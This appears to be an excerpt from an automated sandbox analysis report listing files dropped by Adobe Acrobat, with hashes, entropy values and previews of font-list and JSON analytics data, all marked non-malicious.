                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                              File Type:PostScript document text
                                                                                              Category:dropped
                                                                                              Size (bytes):1233
                                                                                              Entropy (8bit):5.233980037532449
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                              MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                              SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                              SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                              SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                              Malicious:false
                                                                                              Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                              File Type:PostScript document text
                                                                                              Category:dropped
                                                                                              Size (bytes):1233
                                                                                              Entropy (8bit):5.233980037532449
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                              MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                              SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                              SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                              SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                              Malicious:false
                                                                                              Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                              File Type:PostScript document text
                                                                                              Category:dropped
                                                                                              Size (bytes):1233
                                                                                              Entropy (8bit):5.233980037532449
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                              MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                              SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                              SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                              SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                              Malicious:false
                                                                                              Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                              File Type:PostScript document text
                                                                                              Category:dropped
                                                                                              Size (bytes):10880
                                                                                              Entropy (8bit):5.214360287289079
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                                              MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                                              SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                                              SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                                              SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                                              Malicious:false
                                                                                              Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                              File Type:PostScript document text
                                                                                              Category:dropped
                                                                                              Size (bytes):10880
                                                                                              Entropy (8bit):5.214360287289079
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                                              MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                                              SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                                              SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                                              SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                                              Malicious:false
                                                                                              Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                              File Type:JSON data
                                                                                              Category:dropped
                                                                                              Size (bytes):295
                                                                                              Entropy (8bit):5.386030560845315
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:YEQXJ2HXD8qaU55IRR4UhUR0YtmaeoAvJM3g98kUwPeUkwRe9:YvXKXQqaU5WRuUhUZmaVGMbLUkee9
                                                                                              MD5:8651ED41A6534BB3E1F3C35EE0FA9C47
                                                                                              SHA1:D6B002418E151C4BA7BEE5EA74B4B5E914952F1D
                                                                                              SHA-256:F7B0845D95A529DB5614BB4C1E8E85C1F1B2DE59264386372604FB3A00D22A48
                                                                                              SHA-512:F51C6747363A93BDDAB60694D6EBCD6E9D45C9CB71048D38ABA7D1EECBACFAA80D7106BEBF918C887DF9C4536F200219076B4D64D7586FB68AA3138A899FD306
                                                                                              Malicious:false
                                                                                              Preview:{"analyticsData":{"responseGUID":"4d70889c-f099-46fd-a611-433932091b3b","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1737146186186,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                              File Type:JSON data
                                                                                              Category:dropped
                                                                                              Size (bytes):294
                                                                                              Entropy (8bit):5.337003585986906
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:YEQXJ2HXD8qaU55IRR4UhUR0YtmaeoAvJfBoTfXpnrPeUkwRe9:YvXKXQqaU5WRuUhUZmaVGWTfXcUkee9
                                                                                              MD5:C67082154649B1BEBCCCBE8E627DE691
                                                                                              SHA1:60FB87ED5C4A0FBF7292BD5976E3898183751722
                                                                                              SHA-256:7A3C9B1AAA71EF2B23E680E63013A821C9EC856366D1664695AE7B411F3573C5
                                                                                              SHA-512:25C985C046A72A4B3052CAF57CBE132760D80990BB1CA49AB1D550110595471247B4EA49F82DD7A666C764D5D438F27FC81D6E5C8AEF21D12885219B7807FA76
                                                                                              Malicious:false
                                                                                              Preview:{"analyticsData":{"responseGUID":"4d70889c-f099-46fd-a611-433932091b3b","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1737146186186,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                              File Type:JSON data
                                                                                              Category:dropped
                                                                                              Size (bytes):294
                                                                                              Entropy (8bit):5.315402904855337
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:YEQXJ2HXD8qaU55IRR4UhUR0YtmaeoAvJfBD2G6UpnrPeUkwRe9:YvXKXQqaU5WRuUhUZmaVGR22cUkee9
                                                                                              MD5:E1110271D5DAADDF2DEB524AFFA878F5
                                                                                              SHA1:756C315397721E4BE1DF90A7F821887A8ACD4872
                                                                                              SHA-256:94959B1A3CD329126E3F342057D08E923223E6EC4ED163ACA4E979DF09028F2E
                                                                                              SHA-512:0D48834144420E7024F87A3B921E5B2ED208399B233F991682C7BE855C869C178B90905FF675AA99B8774D828641C03357D316E1A2FD9BC0A831E3416ED80C45
                                                                                              Malicious:false
                                                                                              Preview:{"analyticsData":{"responseGUID":"4d70889c-f099-46fd-a611-433932091b3b","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1737146186186,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                              File Type:JSON data
                                                                                              Category:dropped
                                                                                              Size (bytes):285
                                                                                              Entropy (8bit):5.375206089043437
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:YEQXJ2HXD8qaU55IRR4UhUR0YtmaeoAvJfPmwrPeUkwRe9:YvXKXQqaU5WRuUhUZmaVGH56Ukee9
                                                                                              MD5:1F1FD10D43791BA9DE38B457311A8500
                                                                                              SHA1:5265C66A0ACDB15ACB6A0CC6ACF77DD18D7EB2ED
                                                                                              SHA-256:05F2DA964D4372C4231815047C662939807D4DA3E0BE1374381189ED7F74D4CA
                                                                                              SHA-512:EB1CC6AC8F1B8B420ABB8E32DBF77C98A7D3FA4F60EEECD41B82F6C323AB7168AC1D8D85A025E4F4A557A35A8D27839541D8586787EF66C36108A476399EB281
                                                                                              Malicious:false
                                                                                              Preview:{"analyticsData":{"responseGUID":"4d70889c-f099-46fd-a611-433932091b3b","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1737146186186,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                              File Type:JSON data
                                                                                              Category:dropped
                                                                                              Size (bytes):1123
                                                                                              Entropy (8bit):5.690673812373648
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:Yv6XAUgUZKpLgE9cQx8LennAvzBvkn0RCmK8czOCCS4:YvPUgUEhgy6SAFv5Ah8cv/4
                                                                                              MD5:63A933BB848B6340C6651B4FA9D30CBB
                                                                                              SHA1:426F9C8763049B5BC89668F8958ABC28D86BE857
                                                                                              SHA-256:1E98836795370C23371636ECFE79F827B6488960203B3E1A6BD471A45C40771D
                                                                                              SHA-512:2CA8E44811ABCCCA8606E32C7C9D8EEA901EBD9ECD412FA6C4156F80CD5A0883C7CBADA80269BD63BB718770F6B6EA17D97CEE577A2BF5D3CE1C4FF7748555F9
                                                                                              Malicious:false
                                                                                              Preview:{"analyticsData":{"responseGUID":"4d70889c-f099-46fd-a611-433932091b3b","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1737146186186,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                              File Type:JSON data
                                                                                              Category:dropped
                                                                                              Size (bytes):289
                                                                                              Entropy (8bit):5.325092836152544
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:YEQXJ2HXD8qaU55IRR4UhUR0YtmaeoAvJf8dPeUkwRe9:YvXKXQqaU5WRuUhUZmaVGU8Ukee9
                                                                                              MD5:13E8B4AC1EB1DD6E9BCFEC1C7604C675
                                                                                              SHA1:9C65DDB16192B0D206C40A25188FF8EBF59CF821
                                                                                              SHA-256:21F801BEC873383AC70087B1C6D4BD0BDD047EA89DBC8D26AF5FE80AA18D7D9D
                                                                                              SHA-512:1CDCDAA8C3D0891C67EBCAA65D43F2A49CC11870EE4D47B054B2C8EBCFF2CC309179B7A64FDFBE8F0843A3134EF666EFE74C4C482E1F882AE9FD013878818998
                                                                                              Malicious:false
                                                                                              Preview:{"analyticsData":{"responseGUID":"4d70889c-f099-46fd-a611-433932091b3b","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1737146186186,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                              File Type:JSON data
                                                                                              Category:dropped
                                                                                              Size (bytes):292
                                                                                              Entropy (8bit):5.3277780845795935
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:YEQXJ2HXD8qaU55IRR4UhUR0YtmaeoAvJfQ1rPeUkwRe9:YvXKXQqaU5WRuUhUZmaVGY16Ukee9
                                                                                              MD5:6357BECC13669DF3ECD754AF29E0EC67
                                                                                              SHA1:F2BB0E4269047DE6C76CFA469B1F04DDCF95B65A
                                                                                              SHA-256:CC34FA9CE8B021BE2ABAF076FEDC6425021784A28D9EBB2953D67E2E1B201375
                                                                                              SHA-512:BA5CD856447A40C92DBF173D9287159FD2C9B1BEB48F50666E8D2F6902B74C914656CC987E0CA8888F4E7D25D740769021FCB2BE2E3195F2AEA38FB91D3FF7C8
                                                                                              Malicious:false
                                                                                              Preview:{"analyticsData":{"responseGUID":"4d70889c-f099-46fd-a611-433932091b3b","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1737146186186,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                              File Type:JSON data
                                                                                              Category:dropped
                                                                                              Size (bytes):289
                                                                                              Entropy (8bit):5.3338958824236435
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:YEQXJ2HXD8qaU55IRR4UhUR0YtmaeoAvJfFldPeUkwRe9:YvXKXQqaU5WRuUhUZmaVGz8Ukee9
                                                                                              MD5:575070427812D3E2781CADA089DD089E
                                                                                              SHA1:D5E3159D946962E3E5BCC5ACF9DD4DCA418D6DF7
                                                                                              SHA-256:301BAA20A748318FBA999A4F972D6C815B59D488669BAE6DCB4CD93A03A32BBB
                                                                                              SHA-512:9825ACD59F48DA415175B0610F846ED6008F74A10BE48E6E0CA334BD216AAF6515DBAF99A595D840C934768F5EA7417EDFC4F9E3B6EEB6E67746CDE170BC92A8
                                                                                              Malicious:false
                                                                                              Preview:{"analyticsData":{"responseGUID":"4d70889c-f099-46fd-a611-433932091b3b","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1737146186186,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                              File Type:JSON data
                                                                                              Category:dropped
                                                                                              Size (bytes):295
                                                                                              Entropy (8bit):5.35049328693759
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:YEQXJ2HXD8qaU55IRR4UhUR0YtmaeoAvJfzdPeUkwRe9:YvXKXQqaU5WRuUhUZmaVGb8Ukee9
                                                                                              MD5:8A34AE269541AC461EB34B433A134C46
                                                                                              SHA1:B0A500144F6C864DF27200A63C85DDD48A1F244F
                                                                                              SHA-256:344AB5EF0EB5FD19555DD4DEE5ADC4AF686492EFC0F5225EA89BF06996AA2E36
                                                                                              SHA-512:ABA45DD70494B4DFA152DD974001FF8430DA1694C7D93268BD79F0C71F51B2F5701EEB34E9501E47492B774F9F88E1D558333044332943EDF33FFED71B295755
                                                                                              Malicious:false
                                                                                              Preview:{"analyticsData":{"responseGUID":"4d70889c-f099-46fd-a611-433932091b3b","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1737146186186,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                              File Type:JSON data
                                                                                              Category:dropped
                                                                                              Size (bytes):289
                                                                                              Entropy (8bit):5.33148950228105
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:YEQXJ2HXD8qaU55IRR4UhUR0YtmaeoAvJfYdPeUkwRe9:YvXKXQqaU5WRuUhUZmaVGg8Ukee9
                                                                                              MD5:5AF68202798BB27EB554802D5769BA9A
                                                                                              SHA1:45716B1E319F396250F5EC1B5315742D212CED39
                                                                                              SHA-256:DF5E8325C2A64D7E7F053482D004290F691C44504183575082AC3EC4C3CD16B0
                                                                                              SHA-512:538DC09B91C884F1624BBC65BA0CFD8AB48BC28BB30F0DF5FDFFEBD6002120ABF7D584D10CC79820C1A0026FF4E06AE710D91685B21270CDE697E255D428C29A
                                                                                              Malicious:false
                                                                                              Preview:{"analyticsData":{"responseGUID":"4d70889c-f099-46fd-a611-433932091b3b","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1737146186186,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                              File Type:JSON data
                                                                                              Category:dropped
                                                                                              Size (bytes):284
                                                                                              Entropy (8bit):5.317776566216676
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:YEQXJ2HXD8qaU55IRR4UhUR0YtmaeoAvJf+dPeUkwRe9:YvXKXQqaU5WRuUhUZmaVG28Ukee9
                                                                                              MD5:4639128A58895E7E31FF5B25308CA835
                                                                                              SHA1:C30E6547F0FFE4882438EBDA90F4D3320B241FF6
                                                                                              SHA-256:54BC052BD55E88F9BDF638DC060FCE88B24A4A76AD80AF65F26D8EFE7DEADDFA
                                                                                              SHA-512:AEC51E1CF92D5838D11074A992B7A671D07AD935C778A1E8D7C586A2E0887898A326B0D044A5B4C4C12439F0A0975B444794016EE1FE27F51B7CC3F281F16930
                                                                                              Malicious:false
                                                                                              Preview:{"analyticsData":{"responseGUID":"4d70889c-f099-46fd-a611-433932091b3b","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1737146186186,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                              File Type:JSON data
                                                                                              Category:dropped
                                                                                              Size (bytes):291
                                                                                              Entropy (8bit):5.314820177258824
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:YEQXJ2HXD8qaU55IRR4UhUR0YtmaeoAvJfbPtdPeUkwRe9:YvXKXQqaU5WRuUhUZmaVGDV8Ukee9
                                                                                              MD5:8CE1331806F3DB50AACD0F67D4220E1E
                                                                                              SHA1:964ED3634CADC09A6A35644C9897C593856AF3FC
                                                                                              SHA-256:CBEE5C357FA9538116B5CA0FB52573385EBC0AF0C8D50D63795820CFCB262E85
                                                                                              SHA-512:C9B975615CBE3372A44D009F1FCAF69CFC4D94A58FD673CB5C4BF16CE2BE30ECAC44F80244FF38212FF393C193D8CC3016E03869278E85D33CDF81597190D547
                                                                                              Malicious:false
                                                                                              Preview:{"analyticsData":{"responseGUID":"4d70889c-f099-46fd-a611-433932091b3b","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1737146186186,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                              File Type:JSON data
                                                                                              Category:dropped
                                                                                              Size (bytes):287
                                                                                              Entropy (8bit):5.318322978697683
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:YEQXJ2HXD8qaU55IRR4UhUR0YtmaeoAvJf21rPeUkwRe9:YvXKXQqaU5WRuUhUZmaVG+16Ukee9
                                                                                              MD5:136D3BE570368917B680E76A456B1861
                                                                                              SHA1:330F80360EBFEE5385A8F5DA1A9A0C46F15FDC96
                                                                                              SHA-256:224B4ECC1C2772E7AAA5AC418B09C9FF16B6AA3606C9D3793BF6E2E2C89F848F
                                                                                              SHA-512:673DA6DC14C056BF059EC01C10A4F10322A8C8665BC5E2332580D8F2DA17C6A27EE78EB808831A712536282309F2167B75518D4CE3C6ADA297FF7A728A15E18E
                                                                                              Malicious:false
                                                                                              Preview:{"analyticsData":{"responseGUID":"4d70889c-f099-46fd-a611-433932091b3b","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1737146186186,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                              File Type:JSON data
                                                                                              Category:dropped
                                                                                              Size (bytes):1090
                                                                                              Entropy (8bit):5.665144004422439
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:Yv6XAUgUZWamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BS4:YvPUgUmBgkDMUJUAh8cvM4
                                                                                              MD5:F79157AB342416830C74ADF4A9A4EACC
                                                                                              SHA1:D0B1BA35FAB5DCDBDA849EA9498298D5EEA87660
                                                                                              SHA-256:91AFC9D4EA0AEF087A3D7FA4FB936819537D2F586816AB2DB4D12B6EBF43B40B
                                                                                              SHA-512:CDFBC3246BAB29E9E8444478493652933BDBB94E82496E99F30DAD838B4A3AAD841C2A890B7E05B3A2CD8409C49A7DECA9683939260EA32B0F16A17C2DF35755
                                                                                              Malicious:false
